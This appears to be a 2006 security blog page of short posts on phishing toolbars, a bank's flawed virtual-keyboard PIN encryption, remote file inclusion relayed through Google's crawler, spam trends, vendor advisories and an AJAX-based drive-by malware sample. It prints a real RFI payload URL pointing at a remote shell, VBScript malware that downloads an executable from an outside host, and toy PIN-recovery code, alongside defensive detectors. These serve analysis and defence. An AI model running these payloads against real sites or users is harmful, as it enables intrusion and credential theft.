CyLab report: An Evaluation of Anti-Phishing Toolbars

Carnegie Mellon University’s CyLab has released a new study entitled “Phinding Phish: An Evaluation of Anti-Phishing Toolbars”.

The 20-page PDF is located here:

www.cylab.cmu.edu/files/cmucylab06018.pdf

The toolbars tested included SpoofGuard, EarthLink, Google, Netcraft, Cloudmark, TrustWatch, eBay and McAfee SiteAdvisor, along with the built-in protection in the IE7 and Netscape 8 browsers.


Mac OS X 10.4 Security Checklist

Well, I know this is a bit of a shameless plug, but I also think it will help anyone who is tasked with securing OS X in any way, shape or form. I’ve just finished working with a group of people on putting this checklist together for the S.C.O.R.E section of the SANS website, so take a look; I hope it helps someone. It covers all the basic parts of securing OS X and is more than sufficient to get most people started and to end up with a much more secure OS X installation.
http://www.sans.org/score/macosxchecklist.php?

Any comments highly appreciated.


Defeating Image-Based Virtual Keyboards and Phishing Banks

Recently I stumbled upon http://www.hispasec.com/laboratorio/cajamurcia_en.htm, which shows nicely how a Trojan horse can grab a user’s PIN fairly easily by combining keystroke capture with screenshot capture. It made me wonder why the authors took that approach, when the PINs can just as easily be retrieved by sniffing the data the user sends to the banking site, even though it is “encrypted”.

Image-based (or virtual) keyboards were invented to make life harder for banking and phishing Trojan horses, specifically keystroke loggers; some even recommended them specifically as a defence against such Trojans. The bad guys adapted to this technology and escalated: the Trojans now take a screenshot around the mouse pointer on each click to determine which digit was clicked. The thing is, this is often unnecessary, because most (not all) of the implementations of the technique that we looked into were flawed.

Instead of sending the image and waiting for the click positions to be sent back to the server (the variant against which the pointer-location screenshots described above are used), some banks send the PIN in cleartext, while others encrypt it; cajamurcia is one example of the latter. Even when encryption is used, banks tend to implement it badly, making it easy to recover the PIN from its encrypted form.

I looked a bit further into how cajamurcia handles the PIN entered on its virtual keyboard and noticed something strange: the server takes its own timestamp and sends it to you (this already poses a security problem), and that timestamp is then used to encrypt the PIN you entered.

This would have been a reasonable idea if the timestamp were not sent back to the server: that would make it hard, or at least harder, to guess the timestamp used to encrypt the data, at the cost of making it harder for the server to know which timestamp it handed to the client (unless it stores it in the session). As it is, the timestamp is sent back together with the encrypted PIN, so anyone sniffing the request has everything needed to decrypt the PIN.
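To make the flaw concrete, here is a toy reconstruction in Python. It is an added example, not code from this post and not cajamurcia’s real cipher: the XOR-with-SHA-256 keystream, the four-digit PIN, the epoch-style timestamp and the parameter names ts and pin are all assumptions, since the page does not show the actual algorithm. It demonstrates two things: with the timestamp echoed in the request, a passive observer decrypts the PIN directly; and even if the timestamp stayed server-side, a server clock value is low-entropy enough to brute-force around the capture time.

```python
import hashlib
from typing import Dict, List

PIN_LEN = 4  # assumption: four-digit PIN


def keystream(timestamp: int, length: int) -> bytes:
    """Toy key derivation (assumed, not the bank's real cipher): the
    server-supplied timestamp is the only key material."""
    return hashlib.sha256(str(timestamp).encode()).digest()[:length]


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, key))


def client_request(pin: str, server_timestamp: int) -> Dict[str, str]:
    """What the virtual-keyboard page posts back: the timestamp it was
    handed and the PIN encrypted under it (parameter names are assumed)."""
    if len(pin) != PIN_LEN or not pin.isdigit():
        raise ValueError("PIN must be %d digits" % PIN_LEN)
    ct = xor_bytes(pin.encode(), keystream(server_timestamp, PIN_LEN))
    return {"ts": str(server_timestamp), "pin": ct.hex()}


def sniff_recover_pin(request: Dict[str, str]) -> str:
    """Passive observer on the wire: the key travels next to the ciphertext,
    so recovering the PIN is a single XOR."""
    ct = bytes.fromhex(request["pin"])
    return xor_bytes(ct, keystream(int(request["ts"]), len(ct))).decode()


def guess_recover_pin(cipher_hex: str, capture_time: int, window: int = 300) -> List[str]:
    """Even if the timestamp were kept server-side it is low-entropy: trying
    every clock value within +/- window seconds of the capture time yields a
    short list of candidates that decrypt to all digits."""
    ct = bytes.fromhex(cipher_hex)
    candidates = []
    for ts in range(capture_time - window, capture_time + window + 1):
        pt = xor_bytes(ct, keystream(ts, len(ct)))
        if pt.isdigit():  # all ASCII digits: plausible PIN
            candidates.append(pt.decode())
    return candidates


if __name__ == "__main__":
    # constructed values: a PIN and a server clock reading
    req = client_request("4721", 1163593845)
    print("request on the wire:", req)
    print("sniffed PIN:", sniff_recover_pin(req))
    print("brute-forced without ts:", guess_recover_pin(req["pin"], 1163593845 + 17))
```

The fix is not a better timestamp scheme: a secret that the client must know and that travels in the clear is not a secret. The PIN should only ever cross the wire inside TLS, and any nonce the server issues should be bound to the session on the server side and never used as the sole key.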

PoC:

A request to the server would look like:
(more…)


Evil twin WiFi hackers know their target - rich people

Bogus hotspots, aka ‘evil twins’, were found in the first-class lounge of an international airport and in garages specialising in expensive cars that offer Wi-Fi while you wait, reports Iain Thomson of Vnunet.

The article defines the evil twin like this:

So called ‘evil twin’ attacks involve putting a wireless access point near a commercial hotspot and giving it the same name.

The company interviewed by the reporter sees this threat as ‘wireless phishing’.


Anonymizing RFI Attacks Through Google

Google can be used to hack into web sites by actively exploiting them, not merely for information gathering through “Google hacking” (although that is how most of the sites vulnerable to RFI attacks are found).

Place a URL on any web page and Google will find it, visit it and then index it. This mechanism makes it possible to anonymize attacks on third-party web sites by routing them through Google’s crawler.

PoC -
A malicious web page is constructed by an attacker, containing a URL built from:
1. The URI of the third-party site to attack.
2. The file inclusion exploit.
3. A second URI pointing at a malicious PHP shell.

Example URL:
http://victim-site/RFI-exploit?http://URI-with-malicious-code.php

Google will harvest this URL, visit the site with its crawler and index it. That means it accesses the target site with the URL it was given and unwittingly exploits it on behalf of whoever planted the URL. It’s a feature, not a bug.

This is currently exploited in the wild. For example, try searching Google for:
inurl:cmd.gif

An example from the results (this site is no longer vulnerable):
www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd
The %20 looks out of place, but this is how it appears in the search results.

Why use a botnet when one can abuse the Google crawler, which is allowed on most web sites?

Notes:
1. This attack was verified on Google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. File inclusions tie in well with this attack anonymizer, but there is no reason other attack types can’t be used in a similar fashion.
3. The feature might also be used to anonymize communication, as a covert channel.

Noam Rathaus.
(with thanks to Gadi Evron and Lev Toger)
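What this looks like from the target’s side is a crawler user-agent fetching a URL whose parameter value is itself a URL. The following detector, added here as an example (not code from the post or from Google), walks Apache combined-format log lines and flags any query parameter whose value is an absolute http/ftp URL, recording whether the request came in under a crawler user-agent. The sample log lines are constructed: xpl.example.net and evil.example.net stand in for the attacker’s hosts, and the second line reproduces the stray %20 seen in the search results above.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A parameter value that is itself an absolute URL is the RFI signature.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# A crawler UA means the request was relayed, not that the origin is benign.
CRAWLER_RE = re.compile(r'googlebot|bingbot|slurp|yandex|baiduspider', re.IGNORECASE)

# Constructed sample, not real traffic.
SAMPLE_LOG = """\
66.249.65.99 - - [15/Nov/2006:11:02:13 +0000] "GET /index.php?s=http://xpl.example.net/CMD.gif?cmd HTTP/1.1" 200 4123 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.99 - - [15/Nov/2006:11:02:14 +0000] "GET /index.php?s=http:/%20/xpl.example.net/CMD.gif?cmd HTTP/1.1" 200 4123 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
10.0.0.7 - - [15/Nov/2006:11:02:20 +0000] "GET /index.php?s=about HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.4 - - [15/Nov/2006:11:03:01 +0000] "GET /page.php?include=ftp://evil.example.net/shell.txt HTTP/1.0" 500 0 "-" "curl/7.15.1"
"""


def find_rfi_attempts(log_text: str) -> List[Dict[str, object]]:
    """Return one record per query parameter whose value is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl already %-decodes; collapsing whitespace turns the
            # "http:/ /host" form from the search results back into a URL.
            compact = "".join(value.split())
            if REMOTE_URL_RE.match(compact):
                hits.append({
                    "client": m["ip"],
                    "param": name,
                    "include": compact,
                    "status": m["status"],
                    "via_crawler": bool(CRAWLER_RE.search(m["ua"])),
                })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Blocking crawler user-agents is not the fix (the string is trivially forged, and the crawler is only the relay); the include itself has to be fixed, by never passing user input to include/require, restricting includes to an allowlist of local files, and turning allow_url_include off in PHP.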


P2P as a new spam medium, moving from PoC to full operations

Spam on P2P networks used to consist mainly of advertising embedded in downloaded movies and pictures (mostly pornographic in nature), and of viruses and other malware hidden in downloaded warez and just about any other file type (from zip archives to movie files). P2P networks were also used in the past by spammers for address harvesting.
Today P2P has become a direct-to-customer spamvertising medium. This change has been under way for a while; as we speak, it is moving from a proof-of-concept trial to a full spread of spam, day in, day out.
The idea is not new, but now it is becoming serious.

Some choice picks:
eBook - Googlecash - Make Money using google (Learn to use Affiliate programs to make easy money).pdf [I’ve been made aware this one is a real, yet pirated, book. Call it a false positive]
Us Banks Acounts Information [Dir]
How To Create An Automated Ebay Money Machine.pdf
Easy Chair Millionaire Review.pdf
Press Equalizer Review - Flood Your Site With Targeted Traffic, Achieve Top Rankings and Gain Dozens or More Backlinks.pdf
Top Home Based Jobs [Dir]

And so on. These are just some of the scams now being pushed over P2P.

We discussed this before: it started with fake books on the subject of online marketing, and it has now gone all the way to spammers, phishers, “affiliate programs” and spyware operators (in other words, the organized crime groups behind online fraud) looking for new ways and mediums by which to reach their target audience, as email becomes ever more scrutinized and filtered.
(more…)


FunnySad side of security

Reading through the Zero Day Initiative (ZDI) advisory “Verity Ultraseek Request Proxying Vulnerability”, I noticed that it says of the vendor:

Verity has issued an update to correct this vulnerability. More details can be found at: http://www.ultraseek.com/support/docs/RELNOTES.txt

but on reading the release notes you quickly see that there is no mention of this vulnerability; the words “security” and “vulnerability” never appear in them.

This could mean one of two things: ZDI’s advisory is incorrect, or Ultraseek decided to hide the fact that the vulnerability ever existed. I am assuming the latter.

This is of course saddening: no Ultraseek user reading the release notes will ever know the problem existed, unless they look up ZDI’s advisory.

Food for thought…


419 French (Polite) Spam

I received this polite spam, which is the French version of the infamous Nigerian 419 (if that is what it is; it lacks the dead relative). Translated from the French:

Hello,
Let me introduce myself: I am Madame Delanoë, the direct collaborator of Annie Dupas, gold star of clairvoyance 2006.

I am contacting you because you have been drawn by lot and have the chance to benefit from a completely free clairvoyance reading by e-mail with Annie Dupas.
(more…)


Revenge of the Captcha! (Reverse Captcha, Ransom Notes and Image Spam)

[Image: sample image spam, courtesy of Jeff Chan]

For months now, images have been seen in spam in increasing numbers, reaching 30 to 40 per cent of all spam. For a while, counter-measures have been in play, developed by many different people, some we know of and some we don’t: from system administrators writing signatures, to a team at SpamAssassin working on an OCR system to read these images and check their text for spamminess.

When first encountered, a friend of mine was as excited as me: “Why, it’s exactly like a Captcha, only in reverse!”

Hence the term I just coined - Reverse Captcha.

As it’s a cat-and-mouse game of escalation and counter-measures between the bad guys and the good guys, the bad guys learn and make our lives more difficult. I will try to explain what a Reverse Captcha is to me (and no, it’s not a special type of Turing test, although we touch on that below).
(more…)
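The simplest of the counter-measures mentioned above, the one most administrators started with before OCR, is structural: a message whose only real content is an image, with little or no text, is treated as image spam, and the image bytes are hashed as a signature for repeat sightings. The following Python is an added example (not SpamAssassin’s code and not from this post) of that heuristic, run over three constructed messages: an image-only spam, an ordinary text mail, and a legitimate mail with a photo attached. The placeholder image bytes, addresses and the 40-character threshold are assumptions.

```python
import email
import hashlib
from email import policy
from email.message import EmailMessage
from typing import Dict, Optional

MIN_TEXT_CHARS = 40  # assumed threshold: less text than this plus an image is "image only"

# Constructed placeholder image bytes, not a real picture.
FAKE_GIF = b"GIF89a" + bytes(3000)


def build_sample(body_text: str, image: Optional[bytes] = None) -> bytes:
    """Assemble a constructed test message (addresses are placeholders)."""
    msg = EmailMessage()
    msg["From"] = "promo@example.invalid"
    msg["To"] = "someone@example.invalid"
    msg["Subject"] = "hello"
    msg.set_content(body_text)
    if image is not None:
        msg.add_attachment(image, maintype="image", subtype="gif", filename="offer.gif")
    return msg.as_bytes()


IMAGE_SPAM = build_sample("Hi!", FAKE_GIF)
LEGIT_MAIL = build_sample("Hi, the minutes from today's meeting are in the wiki, see page 3 for the action items.")
PHOTO_MAIL = build_sample("Here is the picture from the trip you asked about, see the attachment.", FAKE_GIF)


def image_spam_score(raw: bytes) -> Dict[str, object]:
    """Count visible text versus image parts and hash each image as a signature."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    text_chars = 0
    image_parts = 0
    image_hashes = []
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype.startswith("image/"):
            image_parts += 1
            data = part.get_payload(decode=True) or b""
            image_hashes.append(hashlib.sha1(data).hexdigest())
        elif ctype in ("text/plain", "text/html"):
            text_chars += len(part.get_content().strip())
    return {
        "text_chars": text_chars,
        "image_parts": image_parts,
        "image_sha1": image_hashes,
        "suspicious": image_parts > 0 and text_chars < MIN_TEXT_CHARS,
    }


if __name__ == "__main__":
    for label, raw in (("image spam", IMAGE_SPAM), ("legit", LEGIT_MAIL), ("photo", PHOTO_MAIL)):
        print(label, image_spam_score(raw))
```

The exact-hash signature is what the spammers defeat by randomizing every image (the “ransom note” style the title refers to), which is why the escalation went to OCR; the text-versus-image ratio survives that, at the cost of the photo-with-a-short-note false positive a real deployment has to whitelist.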


Credit card data from cash machine line to…MP3 player!

This Guardian article is quite confusing:

A [Manchester] man who used MP3 players to bug cash machines and steal the personal details of unsuspecting bank customers has been jailed for 32 months.

The report continues that the 41-year-old man and his team attached MP3 players to the backs of _free-standing_ cash machines in bars, bingo halls and the like.

The data they recorded was modem tones: the sound familiar from acoustically coupled modems, or from calling a fax machine’s phone line by mistake!

The team had special software for decoding the tones into readable information. It is easy to guess what followed: yes, they cloned several credit cards by this means.


ZDI: Symantec, Kaspersky, CA, MS have unpatched flaws

The Zero Day Initiative program lists several new vulnerabilities reported within a week. From their Upcoming ZDI Advisories page:

Affected Vendor - Severity - Reported on / Age:

Microsoft - High - 2006.11.08, 7 days ago (2 advisories)
Mozilla - High - 2006.11.08, 7 days ago
Computer Associates - High - 2006.11.08, 7 days ago (3 advisories)
Kaspersky - High - 2006.11.09, 6 days ago
Symantec - High - 2006.11.09, 6 days ago

It appears that many of them relate to AV or firewall software (CA, Kaspersky, Symantec), or am I wrong?

Unspecified Sophos products suffer from unpatched vulnerabilities too, but those are about two months old:

Sophos - High - 2006.09.14, 62 days ago (2 advisories)

And Mozilla and Microsoft products have their own unpatched issues listed as well.


Copy and Paste Security Bugs?? The *BSD case…

So, it’s time for another blog entry, another idiot/dumb post…

http://www.securityfocus.com/archive/1/451637/30/0/threaded

And for sure DragonFlyBSD and TrustedBSD* are also affected by this issue… why?

Does the bug occur because BSD developers don’t know how integer conversion is done? Or just because you copied and pasted the bug from another BSD into yours? It’s always a problem when you copy code from another location. How secure is that code? What historical security problems has it had? Let’s audit it!
Congratulations to you, OpenBSD guys, who simply don’t support things you don’t audit… why would someone want to use FireWire? hehehe. Yeah! It’s pretty easy to talk about the problems, but how can I help solve them? I really don’t know… In my mind, you need to understand the code you are copying, but, for God’s sake, please, copy it ;)

Cya,

Rodrigo Rubira Branco (BSDaemon).


Site of Polish police defaced

It appears that one web site of the Polish police, www.elblag.policja.gov.pl/, was defaced on Tuesday.

A Zone-H mirror is located here. The home page was the target of the attack, which is why the site is not working right now.

They were running Linux with the following Apache setup:

Apache-AdvancedExtranetServer/2.0.47 Mandrake Linux/1.6.91mdk mod_perl/1.99_08 Perl/v5.8.0 auth_mysql/1.11 mod_ssl/2.0.47 OpenSSL/0.9.7a PHP/4.3.1

If any readers know what “elblag” means, I would be grateful ;-)


6 new advisories, none affect Vista

It sounds like a good start: Vista appears not to be affected by any of the 6 new advisories Microsoft released today. The one vulnerability said to affect Vista is the XML Core Services vulnerability in IE that has recently been exploited by malicious web sites to execute arbitrary code.

It would be interesting to see whether this trend of Vista staying outside the spotlight of vulnerabilities continues.

[UPDATE] - The XML vulnerability doesn’t affect Vista; sorry for the confusion:

Is Windows Vista vulnerable to this issue?
Windows Vista does not include a vulnerable version of Microsoft XML Core Services. Windows Vista includes msxml6.dll version 6.10.1129 and is not vulnerable. However, if an application has been applied that installed a vulnerable version of Microsoft XML Core Services 4.0 this update should be applied


Notes/Domino flaw enables theft of ID files via the NRPC protocol

As users familiar with Notes/Domino systems know, publishing Address Books on the company web site is not a good idea.

Now let’s look at the risks to ID files. It was not widely covered last week when information about an information disclosure vulnerability in Domino systems was published: the Notes Remote Procedure Call (NRPC) protocol on port 1352 allows user ID files to be downloaded remotely. Huh!

Versions 5.0, 6.0, 6.5 and 7.0 are affected. Fixed versions 6.5.5 Fix Pack 2 (FP2) and 7.0.2 have been released. There is no fix for R5, because R5 is no longer supported. The vendor states that Windows, Linux, AIX and Solaris systems are vulnerable.

IBM Technote document #1248026 is available here.

More details are in the FortConsult advisory [PDF] by Andrew Christensen.

Old-fashioned organisations possibly still using Notes R5: it’s time to upgrade to R6 or R7 ASAP.


Malware utilizes AJAX to install itself

One of our customers has brought this HTML-based malware to our attention:

<title></title>
<head></head>
<body>
<script language="VBScript">
on error resume next

' due to how ajax works, the file MUST be within the same local domain
dl = "http://grupo-arroba.by.ru/grupo.exe"

' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
(more…)
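The classid in that snippet, BD96C556-65A3-11D0-983A-00C04FC29E36, is the MDAC RDS.DataSpace control whose CreateObject method was patched in MS06-014; the script uses it to instantiate Microsoft.XMLHTTP from a web page and fetch an executable. The following Python is an added example (not the malware and not code from this post) of pulling the indicators out of such a page: object CLSIDs, the ProgIDs handed to CreateObject (resolving the VBScript variable indirection used above), and string-literal URLs. The sample HTML is constructed from the snippet with a placeholder URL, and the Adodb.Stream line is assumed from the “create adodbstream object” comment, since the page’s copy is cut off.

```python
import re
from typing import Dict, List

# Constructed sample modelled on the snippet above (placeholder URL).
SAMPLE_HTML = '''<html><head></head><body>
<script language="VBScript">
on error resume next
dl = "http://malware.example.invalid/grupo.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str = "Microsoft.XMLHTTP"
Set x = df.CreateObject(str, "")
Set s = df.CreateObject("Adodb.Stream", "")
</script></body></html>'''

# RDS.DataSpace, the MDAC control abused for drive-by downloads (MS06-014).
KNOWN_BAD_CLSIDS = {"BD96C556-65A3-11D0-983A-00C04FC29E36": "RDS.DataSpace (MS06-014)"}

ASSIGN_RE = re.compile(r'\b(\w+)\s*=\s*"([^"]*)"')
CLSID_RE = re.compile(r'clsid:([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})', re.IGNORECASE)
URL_RE = re.compile(r'"((?:https?|ftp)://[^"\s]+)"', re.IGNORECASE)
CREATEOBJECT_RE = re.compile(r'\bCreateObject\(\s*(?:"([^"]+)"|(\w+))', re.IGNORECASE)


def extract_iocs(html: str) -> Dict[str, object]:
    """Collect CLSIDs, CreateObject ProgIDs and URLs from a page and rate it."""
    variables = {name: value for name, value in ASSIGN_RE.findall(html)}
    clsids = [c.upper() for c in CLSID_RE.findall(html)]
    urls = URL_RE.findall(html)
    progids: List[str] = []
    for literal, varname in CREATEOBJECT_RE.findall(html):
        # CreateObject(str, "") hides the ProgID behind a variable; resolve it.
        progids.append(literal or variables.get(varname, "<unresolved:%s>" % varname))

    bad_controls = [KNOWN_BAD_CLSIDS[c] for c in clsids if c in KNOWN_BAD_CLSIDS]
    fetches = any(p.lower().endswith("xmlhttp") for p in progids)
    executable = any(u.lower().endswith(".exe") for u in urls)
    if bad_controls and fetches and executable:
        verdict = "drive-by download"
    elif bad_controls:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {
        "clsids": clsids,
        "known_bad": bad_controls,
        "progids": progids,
        "urls": urls,
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(extract_iocs(SAMPLE_HTML))
```

The URL and the hash of grupo.exe are the perishable indicators; the CLSID-plus-XMLHTTP-plus-executable pattern is the durable one, and is what a proxy or IDS rule should key on.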


Vulnerability Scanner